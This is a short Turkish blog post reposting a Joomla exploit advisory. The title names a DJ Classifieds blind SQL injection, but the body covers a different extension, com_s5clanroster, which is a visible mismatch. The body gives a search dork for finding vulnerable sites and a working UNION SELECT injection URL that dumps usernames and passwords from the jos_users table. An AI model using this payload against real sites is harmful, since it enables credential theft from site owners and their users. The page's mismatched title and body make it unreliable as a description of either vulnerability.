Joomla DJ Classifieds Extension 2.0 – Blind SQL Injection Vulnerability

joomla-aciklariJoomla DJ Classifieds Extension 2.0 – Blind SQL Injection oluşum yeri ve açığın kullanımı konusunda açıklamalar şu şekildedir.

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
===[ Exploit ]===

Sql Injection:
==============

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################

 		 	   		  

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir